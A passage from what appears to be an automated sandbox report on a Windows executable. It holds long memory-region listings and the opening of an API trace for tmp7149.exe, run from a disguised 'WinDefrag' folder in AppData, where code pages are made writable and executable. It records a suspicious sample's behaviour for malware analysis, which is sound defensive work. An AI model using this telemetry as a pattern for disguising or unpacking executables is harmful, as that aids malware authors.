end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2701 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2702 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2703 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2704 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2705 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2706 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2707 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2708 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2709 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2710 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2711 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2712 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2713 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2714 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2715 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2716 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2717 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2718 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2719 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2720 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2721 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2722 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2723 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2724 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2725 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2726 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2727 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2728 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2729 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2730 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2731 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2732 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2733 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2734 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2752 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 2753 start_va = 0x590000 end_va = 0x594fff entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 2754 start_va = 0x10000000 end_va = 0x10006fff entry_point = 0x0 region_type = private name = "private_0x0000000010000000" filename = "" Region: id = 2755 start_va = 0x5b0000 end_va = 0x5b0fff entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 2756 start_va = 0x5c0000 end_va = 0x5c0fff entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 2757 start_va = 0x5d0000 end_va = 0x63afff entry_point = 0x5d0000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2790 start_va = 0x640000 end_va = 0x668fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 2791 start_va = 0x640000 end_va = 0x648fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 2792 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 2793 start_va = 0x640000 end_va = 0x642fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 2794 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 2795 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 2797 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 2800 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 2803 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 2806 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 2809 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 2812 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 2815 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 2818 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 2821 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 2824 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 2827 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 2830 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 2833 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 2836 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 2839 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 2842 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 2845 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 2848 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 2851 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 2854 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 2857 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 2860 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 2863 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 2866 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 2869 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 2872 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 2875 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 2878 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 2881 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 2884 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 2887 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 2890 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 2893 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 2896 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 2899 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 2902 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 2905 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 2908 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 2911 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 2914 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 2917 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 2920 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 2923 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 2926 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 2929 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 2932 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 2935 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 2938 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 2941 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 2944 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 2947 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 2950 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 2985 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 2988 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 2991 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 2994 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 2997 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 3000 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 3003 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 3006 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 3009 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 3012 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 3015 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 3018 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 3021 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 3024 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 3027 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 3030 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 3033 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 3036 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 3039 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 3075 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 3078 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 3081 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 3084 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 3087 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 3090 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 3093 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 3096 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 3115 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 3118 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 3121 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 3125 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 3128 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 3131 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 3134 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 3137 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 3140 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 3182 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 3185 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 3188 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 3191 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 3194 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 3197 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 3200 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 3205 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 3208 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 3212 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 3215 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 3218 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 3222 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 3225 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 3228 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 3301 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 3304 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 3307 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 3312 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 3315 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 3320 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 3323 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 3326 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 3329 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 3332 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 3335 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 3338 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 3341 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 3344 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 3347 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 3350 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 3353 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 3356 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 3362 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 3372 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 3375 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 3378 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 3381 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 3384 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 3387 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 3390 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 3393 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 3396 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 3399 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 3402 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 3405 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 3408 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 3411 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 3414 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 3416 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Thread: id = 146 os_tid = 0x24c [0129.519] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x28ff50 | out: lpSystemTimeAsFileTime=0x28ff50*(dwLowDateTime=0xeca44a40, dwHighDateTime=0x1d48db2)) [0129.519] GetCurrentProcessId () returned 0x668 [0129.519] GetCurrentThreadId () returned 0x24c [0129.519] GetTickCount () returned 0x2c0ed [0129.519] QueryPerformanceCounter (in: lpPerformanceCount=0x28ff58 | out: lpPerformanceCount=0x28ff58*=1819714300000) returned 1 [0129.519] GetStartupInfoA (in: lpStartupInfo=0x28ff2c | out: lpStartupInfo=0x28ff2c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x5, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0129.519] __set_app_type (_Type=0x2) [0129.519] __getmainargs (in: _Argc=0x41f01c, _Argv=0x41f018, _Env=0x41f014, _DoWildCard=0, _StartInfo=0x41f000 | out: _Argc=0x41f01c, _Argv=0x41f018, _Env=0x41f014) returned 0 [0129.520] VirtualQuery (in: lpAddress=0x401000, lpBuffer=0x28fd64, dwLength=0x1c | out: lpBuffer=0x28fd64*(BaseAddress=0x401000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x15000, State=0x1000, Protect=0x20, Type=0x1000000)) returned 0x1c [0129.520] VirtualProtect (in: lpAddress=0x401000, dwSize=0x15000, flNewProtect=0x40, lpflOldProtect=0x28fdb0 | out: lpflOldProtect=0x28fdb0*=0x20) returned 1 [0129.520] VirtualQuery (in: lpAddress=0x4012b9, lpBuffer=0x28fd64, dwLength=0x1c | out: lpBuffer=0x28fd64*(BaseAddress=0x401000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x15000, State=0x1000, Protect=0x80, Type=0x1000000)) returned 0x1c [0129.520] VirtualProtect (in: lpAddress=0x401000, dwSize=0x15000, flNewProtect=0x40, lpflOldProtect=0x28fd60 | out: lpflOldProtect=0x28fd60*=0x80) returned 1 [0129.520] VirtualProtect (in: lpAddress=0x401000, dwSize=0x15000, flNewProtect=0x80, lpflOldProtect=0x28fd60 | out: lpflOldProtect=0x28fd60*=0x40) returned 1 [0129.521] VirtualQuery (in: lpAddress=0x401000, lpBuffer=0x28fe94, dwLength=0x1c | out: lpBuffer=0x28fe94*(BaseAddress=0x401000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x1000, State=0x1000, Protect=0x40, Type=0x1000000)) returned 0x1c [0129.521] VirtualProtect (in: lpAddress=0x401000, dwSize=0x1000, flNewProtect=0x20, lpflOldProtect=0x28fe90 | out: lpflOldProtect=0x28fe90*=0x40) returned 1 [0129.521] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4096a0) returned 0x0 [0129.521] strlen (_Str="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x37 [0129.521] _onexit (_Func=0x409e50) returned 0x409e50 [0129.521] strlen (_Str="use_fc_key") returned 0xa [0129.521] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-use_fc_key") returned 0x2c [0129.522] WaitForSingleObject (hHandle=0x2c, dwMilliseconds=0xffffffff) returned 0x0 [0129.522] FindAtomA (lpString="gcc-shmem-tdm2-use_fc_key-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0129.522] AddAtomA (lpString="gcc-shmem-tdm2-use_fc_key-aaaaaaaaaaAaAAaAaaaaaAAAAAaAAAaa") returned 0xc000 [0129.522] GetAtomNameA (in: nAtom=0xc000, lpBuffer=0x28fd7c, nSize=59 | out: lpBuffer="gcc-shmem-tdm2-use_fc_key-aaaaaaaaaaAaAAaAaaaaaAAAAAaAAAaa") returned 0x3a [0129.522] ReleaseMutex (hMutex=0x2c) returned 1 [0129.522] CloseHandle (hObject=0x2c) returned 1 [0129.522] strlen (_Str="sjlj_once") returned 0x9 [0129.522] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-sjlj_once") returned 0x2c [0129.522] WaitForSingleObject (hHandle=0x2c, dwMilliseconds=0xffffffff) returned 0x0 [0129.522] FindAtomA (lpString="gcc-shmem-tdm2-sjlj_once-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0129.522] AddAtomA (lpString="gcc-shmem-tdm2-sjlj_once-aaaaaaaaaaAaAAaAaaaaaAAAAAAaaAaa") returned 0xc001 [0129.523] GetAtomNameA (in: nAtom=0xc001, lpBuffer=0x28fd5c, nSize=58 | out: lpBuffer="gcc-shmem-tdm2-sjlj_once-aaaaaaaaaaAaAAaAaaaaaAAAAAAaaAaa") returned 0x39 [0129.523] ReleaseMutex (hMutex=0x2c) returned 1 [0129.523] CloseHandle (hObject=0x2c) returned 1 [0129.523] strlen (_Str="once_global_shmem") returned 0x11 [0129.523] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-once_global_shmem") returned 0x2c [0129.523] WaitForSingleObject (hHandle=0x2c, dwMilliseconds=0xffffffff) returned 0x0 [0129.523] FindAtomA 